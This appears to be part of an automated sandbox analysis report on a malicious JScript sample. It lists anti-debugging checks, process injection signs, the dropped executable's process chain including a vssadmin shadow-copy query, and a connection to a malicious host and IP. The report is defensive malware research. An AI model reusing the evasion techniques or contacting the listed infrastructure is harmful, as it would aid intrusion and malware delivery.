Source: csrss.exe, 00000007.00000002.8986663720.0000000002712000.00000004.sdmpBinary or memory string: amd64_hyperv-commandline-tool.resources_31bf3856ad364e35_10.0.17134.1_en-us_d5c4e754bc26201d\amd64_hyperv-compute-guestcomputeservice_31bf3856ad364e35_10.0.17134.1_none_7305852b7c12035c\amd64_hyperv-compute-guestcomputeservice_31bf3856ad364e35_10.0.17134.137_none_6f3c182768f074fa\amd64_microsoft-analog-h2-hydrogenrt_31bf3856ad364e35_10.0.17134.1_none_db29adc7273ced52\amd64_microsoft-hyper-v-3dvideo.resources_31bf3856ad364e35_10.0.17134.1_en-us_49c786157c795a73\amd64_microsoft-deviceproxy-wmiv2-provider_31bf3856ad364e35_10.0.17134.1_none_e9f22d8bf1fc7e92\amd64_microsoft-hyper-v-bpa.resources_31bf3856ad364e35_10.0.17134.1_en-us_461210c45e54cb44\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.17134.1_none_15d1dfb8ceafada1\amd64_microsoft-analog-h2-animpkg-baked_31bf3856ad364e35_10.0.17134.1_none_6eba91e284242d6b\amd64_microsoft-appmodel-exec-events_31bf3856ad364e35_10.0.17134.1_none_07677813525018a6\amd64_microsoft-analog-h2-fxpkg-baked_31bf3856ad364e35_10.0.17134.1_none_1be886b2910c8266\amd64_mi
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-m..t-clients.resources_31bf3856ad364e35_10.0.17134.1_en-us_d370585015d204f5\q
Source: rad8AE2B.tmp, 00000006.00000002.9885370892.00000000040DD000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vpmem_31bf3856ad364e35_10.0.17134.1_none_c277eb1734798565.manifest36c\6q
Source: rad8AE2B.tmp, 00000006.00000002.9869833108.0000000003E4E000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-firewallrules_31bf3856ad364e35_10.0.17134.1_none_b9673992b104448b.manifest\+
Source: rad8AE2B.tmp, 00000006.00000002.9830618547.0000000000951000.00000004.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-rdv_31bf3856ad364e35_10.0.17134.1_none_605452
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-o..oyment-languagepack_31bf3856ad364e35_10.0.17134.1_en-us_170afe8321651ef9.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmms.resources_31bf3856ad364e35_10.0.17134.1_en-us_2b9c39681a7206ff\p
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mum
Program exit points
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp API call chain: ExitProcess graph end node graph_6-47192
Queries a list of all running processes
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp Process information queried: ProcessInformation

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Windows\SysWOW64\wscript.exe System information queried: KernelDebuggerInformation
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp Code function: 6_2_00449089 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,_memset,GetTickCount,GetTickCount,Heap32ListFirst,_memset,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,Process32Next,GetTickCount,GetTickCount,Thread32First,Thread32Next,GetTickCount,GetTickCount,Module32First,Module32Next,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId (6_2_00449089)
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp Code function: 6_2_0041A13C LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetP (6_2_0041A13C)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp Code function: 6_2_005664B0 TlsGetValue,TlsGetValue,TlsGetValue,TlsGetValue,CreateWaitableTimerA,SetWaitableTimer,WaitForMultipleObjects,CloseHandle,Sleep,CloseHandle,TlsGetValue,ResetEvent,__CxxThrowException@8,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree (6_2_005664B0)
Contains functionality to register its own exception handler
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp Code function: 6_2_00550F9A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter (6_2_00550F9A)
Creates guard pages, often used to prevent reverse engineering and debugging
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp Memory protected: page readonly | page write copy | page execute and read and write | page execute and write copy | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\wscript.exe Network Connect: 92.61.149.127 80
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c C:\Users\user~1\AppData\Local\Temp\rad8AE2B.tmp
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp C:\Users\user~1\AppData\Local\Temp\rad8AE2B.tmp
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp Process created: C:\Windows\System32\vssadmin.exe C:\Windows\system32\vssadmin.exe List Shadows
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\chcp.com chcp
May try to detect the Windows Explorer process (often used for injection)
Source: rad8AE2B.tmp, 00000006.00000002.9832428740.0000000000FB0000.00000002.sdmpBinary or memory string: Program Manager
Source: rad8AE2B.tmp, 00000006.00000002.9832428740.0000000000FB0000.00000002.sdmpBinary or memory string: Shell_TrayWnd
Source: rad8AE2B.tmp, 00000006.00000002.9832428740.0000000000FB0000.00000002.sdmpBinary or memory string: Progman
Source: rad8AE2B.tmp, 00000006.00000002.9832428740.0000000000FB0000.00000002.sdmpBinary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp Queries volume information: C:\ VolumeInformation
Contains functionality to query local / system time
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp Code function: 6_2_0054E1CE GetSystemTimeAsFileTime,__aulldiv (6_2_0054E1CE)
Contains functionality to query the account / user name
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp Code function: 6_2_004176EB _memset,GetUserNameW (6_2_004176EB)
Contains functionality to query time zone information
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp Code function: 6_2_00560999 __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson (6_2_00560999)
Contains functionality to query windows version
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp Code function: 6_2_00449089 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,_memset,GetTickCount,GetTickCount,Heap32ListFirst,_memset,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,Process32Next,GetTickCount,GetTickCount,Thread32First,Thread32Next,GetTickCount,GetTickCount,Module32First,Module32Next,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId (6_2_00449089)
Queries the cryptographic machine GUID
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Behavior Graph


Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
Behavior Graph ID: 773096
Sample: 21#U043e #U0437#U0430#U043a#U0430#U0437#U0435.js
Start date: 29/01/2019
Architecture: WINDOWS
Score: 100
Sample-level signatures: May disable shadow drive data (uses vssadmin); Downloads files with wrong headers with respect to MIME Content-Type; May check the online IP address of the machine; 4 other signatures
Processes started from the sample: wscript.exe, csrss.exe, csrss.exe
wscript.exe: DNS/IP poshpebbles.net 92.61.149.127, ports 50024 and 80 (SERVAGEDE, European Union); dropped C:\Users\user~1\AppData\...\rad8AE2B.tmp (PE32); signatures: System process connects to network (likely due to code injection or exploit); JScript performs obfuscated calls to suspicious functions; Deletes itself after installation; child process: cmd.exe